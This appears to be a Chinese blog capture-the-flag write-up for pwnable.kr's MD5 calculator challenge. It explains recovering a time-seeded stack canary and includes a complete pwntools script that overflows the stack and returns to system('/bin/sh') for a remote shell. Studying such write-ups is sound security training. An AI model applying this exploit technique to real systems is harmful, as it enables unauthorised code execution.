stack canary之pwnbale.kr MD5 calculator

最新推荐文章于 2023-08-10 15:03:17 发布
最新推荐文章于 2023-08-10 15:03:17 发布
阅读量287 收藏
点赞数
分类专栏: 逆向分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiuweideqixu/article/details/108240109
版权

We made a simple MD5 calculator as a network service.
Find a bug and exploit it to get a shell.

Download : http://pwnable.kr/bin/hash
hint : this service shares the same machine with pwnable.kr web service

Running at : nc pwnable.kr 9002

 

程序的执行:

main函数反汇编

上图中的地10行相当于获取当前的时间戳,并把它赋值给v3。第11行中把v3作为参数(随机数种子)传入到srand函数中,那么随后的调用rand函数的操作,都将会根据这个设置好了的随机数种子产生随机数。需要注意的是,一旦传入到srand函数中相同的seed,那么后续多次调用rand函数的时候,产生的随机数序列是相同的。

my_hash()函数反汇编

如上图,总共调用了8次rand函数。并且把他们保存在了栈中以v2作为起始地址的地方。这样以来,只要使用相同的时间戳作为随机数种子传入到srand函数中。那么就可以反推出v10的值。我们知道,main函数和其调用的子函数通过执行_readgsdword产生的canary是相同的。虽然canary是会经常发生变动的。

下面,可以重点分析一下process_hash函数


程序中总共有两个要求我们输入的地方。第一个地方在输入captcha,第二个地方输入的是经过base64编码之后的字符串。从上图第15行可知,程序会解码之后保存在栈中的那个被分配了512字节的地方。由于全局变量g_buf总共有1024字节,也就是说,结果base64编码之后的字符串的最大长度是1024。那么假设一个字符串长度为len,记过base64编码之后生成的字符串的长度为len/3*4。所以在结果base64编码之前,也就是说理论上我们可以输入到栈中的大小是:1024/4*3=768字节。因为栈中保存的是解码之后的,也就是相当于编码之前的字符串。所以我们可以进行栈泄露。但是由于存在canary保护,所以我们需要找到canary的具体值,然后在payload中的对应位置想入相同的canary,那么就可以骗过stack canary机制。

所以,构造的payload为:

payload = 'A'.encode('ascii') * 512 + p32(canary) + 'A'.encode('ascii') * 12 + p32(plt_system) + p32(0x0000000) + p32(0x0804B0E0 + 720) # 总共540个字节

其中0x0804B0E0是全局变量g_buf的地址。由于payload为540字节。540/3*4=720.所以字符串"/bin/sh\0"要存放与0x0804B0E0的地方。后面会作为system的参数被传入到system中。

from zio3 import p32
from pwn import *
# elf = ELF('./hash')
# plt_system = elf.plt['system']
plt_system = 0x08048880
p = remote('pwnable.kr',9002)
# p = process('./hash')
t = int(time.time())
print(p.recvline())
temp_recv = p.recvline()
print(temp_recv)
capcha = re.search(': [^\n]+', temp_recv.decode('ascii')).group(0)[2:]
print('capcha = ',capcha)
p.sendline(capcha)
print('output:',p.recvline())
print(p.recvline())
canary = '0x' + os.popen('./canary {} {}'.format(str(t), capcha)).read() # canary是一个C语言可执行程序
print('canary:',canary)
canary = int(canary, 16) # 十六进制的字符串转换为十进制的数字
payload = 'A'.encode('ascii') * 512 + p32(canary) + 'A'.encode('ascii') * 12 + p32(plt_system) + p32(0x0000000) + p32(0x0804B0E0 + 720) # 总共540个字节
print(len(b64e(payload)))
print(b64e(payload)+'/bin/sh\0')
p.sendline(b64e(payload) + '/bin/sh\0')
p.interactive()

 

久许
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ELK-stack之日志分析.zip
04-16
大型日志分析 ElasticSearch+Logstash+Kibana教程从部署到日志采集到日志展示完整流程.
M5Stack:M5Stack Arduino库
04-28
M5Stack库 English || 欢迎使用M5Stack Core进行编程 1.开始 这是入门文章 1.对于MacOS 2.对于Windows 2.例 3. API参考 4.硬件参考 引脚排列 我们有几种M5Core, 。 LCD和TF卡 液晶屏分辨率:320x240 ESP32...
Linux 内核安全增强—— stack canary
weixin_71478434的博客
08-30 1433
per-cpu 变量的引入是为了实现per-task的stack canary, 每个cpu上同时只能运行一个进程/线程, per cpu变量可以随进程的切换而切换,故通过一个per-cpu变量完全可以为每个进程/线程解引用到不同的canary地址(后续称为per-cpu canary),以实现per-task的canary.默认stack canary使用全局符号(变量) __stack_chk_guard 作为原始的canary(后续称为全局canary), 在gcc/clang中均使用相同的名字...
stack canary介绍
最新发布
weixin_42692164的博客
08-10 356
CONFIG_STACKPROTECTOR和CONFIG_STACKPROTECTOR_STRONG是Linux内核的配置选项,用于控制内核在编译时是否启用Stack Canary(栈保护)以及保护级别的设置。如果该选项被启用(设置为y或m),则内核会在关键的函数和代码路径中插入Stack Canary的相关代码。默认情况下,Canary的保护级别是较低的,只会对函数中使用了缓冲区的变量进行保护。在编译代码时,可以使用一些与Canary相关的编译选项来启用或禁用Stack Canary
栈溢出保护原理——Stack Canaries
weixin_62675330的博客
02-26 3001
栈溢出保护原理——Stack Canaries Stack Canaries (取名自地下煤矿的金丝雀,因为它能比矿工更早地发现煤气泄露,有预警的作用) 是一种对抗栈溢出攻击的技术,即SSP安全机制 Canary的值是栈上的一个随机数,在程序启动时随机生成并保存在比函数返回地址更低的位置。由于栈溢出是从低地址向高地址进行覆盖,因此攻击者要想控制函数的返回指针,就一定要先覆盖到Canary。程序只需要在函数返回前检查Canary是否被篡改,就可以达到保护栈的目的。 一,Canaries的分类 canar
linux 内核安全增强(一)— stack canary
ashimida
09-15 5460
一、背景知识 ——aarch64的函数栈 1. 栈生长方向与push/pop操作 栈是一种运算受限的线性表,入栈的一端为栈顶,另一端则为栈底,其生长方向和操作顺序理论上没有限定.而在aarch64平台上: 栈是向低地址方向增长的(STACK_GROWS_DOWNWARD) 栈的PUSH/POP通常要先移动SP: PUSH操作为PRE_DEC,即 PUSH操作为 sp = sp -4; store; POP操作为 POST_INC,即POP操作为 read; sp=sp+4; ...
Stack Canary
bahuishi9641的博客
08-07 823
0x00 canary保护机制 Canary保护机制的原理,是在一个函数入口处从gs(32位)或fs(64位)段内获取一个随机值,一般存到eax - 0x4(32位)或rax -0x8(64位)的位置。如果攻击者利用栈溢出修改到了这个值,导致该值与存入的值不一致,__stack_chk_fail函数将抛出异常并退出程序。Canary最高字节一般是\x00,防止由于其他漏洞产生的Cana...
WordPress导航主题源码 webstack pro V2.0406主题
05-20
V2.0406 添加搜索自动索引百度热搜关键词 添加首页tab标签模式加载方式切换(ajax加载和普通加载)(首页设置) 修复tab标签ajax加载模式会显示未审核的网址的bug 小屏幕热搜采用水平滚动 优化主题支持 ...
webstack1.09.zip
06-27
webstack1.09.zipwebstack1.09.zipwebstack1.09.zipwebstack1.09.zipwebstack1.09.zipwebstack1.09.zipwebstack1.09.zipwebstack1.09.zipwebstack1.09.zipwebstack1.09.zipwebstack1.09.zipwebstack1.09.zipwebstack...
Full-Stack Vue.js 2 and Laravel 5 Bring the frontend and backend together epub
01-17
Full-Stack Vue.js 2 and Laravel 5 Bring the frontend and backend together with Vue, Vuex, and Laravel 英文epub 本资源转载自网络,如有侵权,请联系上传者或csdn删除 查看此书详细信息请在美国亚马逊官网...
[BUUCTF-pwn] noxctf2018_the_name_calculator
weixin_52640415的博客
12-31 430
printf格式化字符串漏洞 漏洞点: main中读name有溢出,覆盖到v4可以进入下一步 int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[28]; // [esp+Ch] [ebp-2Ch] BYREF int v4; // [esp+28h] [ebp-10h] unsigned int v5; // [esp+2Ch] [ebp-Ch] v5 = _
2021dasctf七月赛 pwn题解复现(strdup,md5,protect,setcontext)
weixin_46521144的博客
08-09 879
前言:算是第一次参加自己觉得能力匹配的比赛之前的0ctf,tctf的,感觉自己就像个混,2021国赛参加的时候全程都在学没学过的堆,所以其实也没觉得自己能力赶得上。然而第一次打比赛嘛,总归是不可能会做的,不过也算是知道了,比赛也没有想象中的那么恐怖。 本篇文章参考的wp https://kr0emer.com/2021/08/04/DASCTF%20July%20X%20CBCTF%204th%20pwn/ Easyheap 保护全开,也开了沙箱,但是同时也开了一块RWX的段,地址是固定的0x233300
攻防世界PWN之calc2题解
seaaseesa的博客
12-12 1042
calc2 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,发现libc被静态编译进了程序中,又由于没有开启PIE,,所以,我们就直接可以获得需要的函数的地址。然而,我们发现,system、execve这些函数都没有,有没有one_gadget,那么我们只能通过系统调用来构造ROP执行/bin/sh来getshell 发现,该程序是一个四则运算表达式计算程序 其中,我...
stack canary 的认识
guilanl的专栏
03-15 9004
在前面的博客里面,已经介绍了 stack overflow 的攻击原理,其中也设计到了 GCC 编译器的 stack canary 技术,用于预防 stack overflow. 现在再来详细了解一下stack canaries 的种类,已经他们的作用吧。 如果能在运行时检测出 stack overflow 破坏,就有可能对函数栈进行保护。目前的堆栈保护实现大多使用基于 “Cana
stack canary绕过思路
sea_time的博客
11-29 1914
canary 简介: 我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖ebp、eip等,从而达到劫持控制流的目的。然而stack canary这一技术的应用使得这种利用手段变得难以实现。canary的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼。工人们每次下井都会带上一只金丝雀如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,...
pwnable md5 calculator(随机数生成)
九层台
09-28 480
开启了canary和NX保护 int __cdecl main(int argc, const char **argv, const char **envp) { unsigned int v3; // eax int v5; // [esp+18h] [ebp-8h] int v6; // [esp+1Ch] [ebp-4h] setvbuf(stdout, 0, 1, 0);...
pwnable.kr - md5 calculator
加号减减号的博客
03-07 1796
题目简介 分析 wirteup 参考资料 题目简介 题目给出的信息如下: 可知该题实现了一个 MD5 计算器,并且给出了一个提示,提示稍后再说。做这道题我学到了一个新的技能,就是 python 里面的 os.popen() 的用法,觉得十分有用,希望对大家也有帮助。 分析 下载得到文件,IDA 分析得到 main 函数如下: 这里可以得知几个关键的信息,...
【pwnable.krmd5 calculator
子曰小玖的博客
06-06 517
https://r00tnb.github.io/2018/02/25/pwnable.kr-md5%20calculator/ 前言 也是一个很有pwn味道的题目,涉及的知识在掌握范围内所以做起来很爽! 分析 题目只给了可执行文件hash。于是就放到ida中逆向了。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21...
pwnable.kr MD5 calcultor
mylyylmy的博客
08-01 449
首先看一下开了什么保护 使用IDA 反汇编 首先程序设置了时间为随机数种,然后调用了my_hash函数,输出函数的返回值,接着让我们输入my_hash函数的返回值,输入正确才能继续运行程序,进入my_hash函数 首先程序读取了canary的值,并把它赋值给了v10,然后又通过v10变量计算了函数的返回值,在这里除了v10,其他的变量都可以通过时间相同的随机数计算出来(hint中提...
torch.stack(dataset).shape
05-30
`torch.stack(dataset)`的作用是将一个列表中的所有张量按照给定的维度进行堆叠,返回一个新的张量。假设`dataset`是一个包含`n`个形状相同的张量的列表,那么`torch.stack(dataset)`的结果将是一个新的张量,其维度比原来的张量多了一维,新的张量在堆叠维度上的大小是`n`。 例如,假设`dataset`是一个包含3个形状为`(2, 3)`的张量的列表,那么`torch.stack(dataset)`的结果将是一个形状为`(3, 2, 3)`的张量。 因此,`torch.stack(dataset).shape`的作用是返回`torch.stack(dataset)`的形状,即一个元组,包含新的张量在每个维度上的大小。假设`torch.stack(dataset)`的形状是`(n, m, p)`,那么`torch.stack(dataset).shape`的结果将是一个元组`(n, m, p)`。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值